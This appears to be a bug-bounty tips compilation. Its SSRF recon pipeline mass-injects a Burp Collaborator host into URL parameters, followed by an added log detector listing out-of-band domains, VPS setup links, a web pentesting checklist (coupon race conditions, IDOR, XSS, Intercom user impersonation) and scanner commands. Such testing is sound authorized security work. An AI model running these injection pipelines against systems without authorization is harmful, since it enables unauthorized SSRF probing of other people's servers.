🤑Bug Bounty Tips for SSRF🤑
Step 1: Subdomain Enumeration
• DNS Dumpster
• Sublist3r
• Amass
• Google Dorking
• Certificate Transparency Logs
• subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,noscript -o allUrls.txt
Step 4: Inject Burp Collaborator URL in Parameters
cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
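
Seen from the receiving side, the Step 4 traffic stands out in access logs, because qsreplace overwrites every query-string value with the same out-of-band hostname. The detector below is an added example, not part of the original post; the log lines are constructed, and the suffix list beyond oastify.com is an assumption to adjust for your environment.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed list: oastify.com is the domain used in this post; the others are
# well-known public out-of-band (OAST) services. Extend as needed.
OAST_SUFFIXES = ("oastify.com", "burpcollaborator.net", "interact.sh", "oast.fun")
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|PUT|DELETE|HEAD|PATCH) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /fetch?url=40ga7gynfy6pcg06ov.oastify.com&id=40ga7gynfy6pcg06ov.oastify.com HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /img?src=http%3A%2F%2Fabc.oastify.com%2Fx&w=100 HTTP/1.1" 200 90',
    '198.51.100.4 - - [10/Jan/2024:10:00:03 +0000] "GET /go?next=https%3A%2F%2Fnotoastify.com%2F HTTP/1.1" 302 0',
]

def oast_host(value):
    """Return the OAST hostname carried in a parameter value, else None."""
    candidate = value.strip().lower()
    try:  # accept bare hostnames as well as full URLs
        host = urlsplit(candidate if "//" in candidate else "//" + candidate).hostname or ""
    except ValueError:
        return None
    # Match on a label boundary so lookalike domains are not flagged.
    matches = any(host == s or host.endswith("." + s) for s in OAST_SUFFIXES)
    return host if matches else None

def scan(lines):
    """Flag requests whose query parameters point at an OAST domain."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        hits = {n: oast_host(v) for n, v in params if oast_host(v)}
        if not hits:
            continue
        findings.append({
            "client": client,
            "path": urlsplit(target).path,
            "params": sorted(hits),
            "hosts": sorted(set(hits.values())),
            # Every parameter set to one identical value: bulk-replacement signature.
            "bulk": len(params) > 1 and len(hits) == len(params) and len({v for _, v in params}) == 1,
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Requests with `bulk` set are worth correlating by client address, since a single scanner run produces many of them in a short window.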
🤑Bug Bounty VPS Setup🤑
Bug Hunting Autopilot VPS by Om Arora
https://lnkd.in/dkhvZ54t
Setup Bug Bounty Automation by sm4rty
https://lnkd.in/dRW3yX32
VPS Bug Bounty Tools by drak3shift7
https://lnkd.in/dbVwcveD
Setup DigitalOcean VPS to Bug Bounty by SimbaTech
https://lnkd.in/dse2BhkE
Using VPS for Bug Bounty, comparing VPS providers
https://lnkd.in/dZUtg3Hr
Bug Bounty Tools config in VPS by Iheb Hamad
https://lnkd.in/d42rqzwW
Beginners Guide: VPS Setup for Bug Bounty Recon Automation
https://lnkd.in/dxeEAYxJ
Notification system for your Bug Bounty Automation by Ranjan Kumar
https://lnkd.in/djfBqR-4
Emissary Tool (Send notifications via different channels such as Slack, Telegram or Teams in your bug bounty flow) by BountyStrike
https://lnkd.in/dX-aGhRw
SSRF! : Get notified on discord whenever you have an SSRF by a1bi_n_
https://lnkd.in/dsVsj_qq
🚨Web Pentesting Checklist by Ott3rly 🚨
- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
- Register functionality. IDORs, unexpiring tokens, reused tokens.
- Password reset.
- 2FA.
- User Management (auth model). Try to build RBAC matrix.
- My profile section.
- User invites
- See if inviting an existing user to your org exposes their name
- See if inviting an existing user removes them from their own org
- User management
- Customer data
- Look for JS, ctrl+f and try to find /admin, /api, etc.
- Look for API
- If an endpoint has api/v2/, try api/v1/
- Undocumented API Calls and Admin tools
- Upload functions
- Integration functions
- Look for subdomains, don't hack on them since they will be OOS, but try to find a way to elevate it to your main target.
- If you find a bug that's OOS, still ask the customer if they care
Cart section
- Integer overflow
- Business logic errors (-1 number of items)
- Rate limit on coupon
- Race condition on coupon
- Any interesting parameters
Giftcards
- Any interesting parameters
- Race condition
- Reflected XSS
- API endpoint enumeration
Intercom
- Intercom('show');
- Intercom('boot',{email:'known_user@gmail.com'})
🚨afrog - A Security Tool for Bug Bounty, Pentest and Red Teaming🚨
📥Download - https://github.com/zan8in/afrog/
👉Usage -
✅afrog -T urls.txt -S high,critical,medium -o result.html
✅afrog -t https://example.com -S high,critical
🌟use xargs with gau to scan bulk domains without losing speed🌟
👉Command
xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,noscript,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt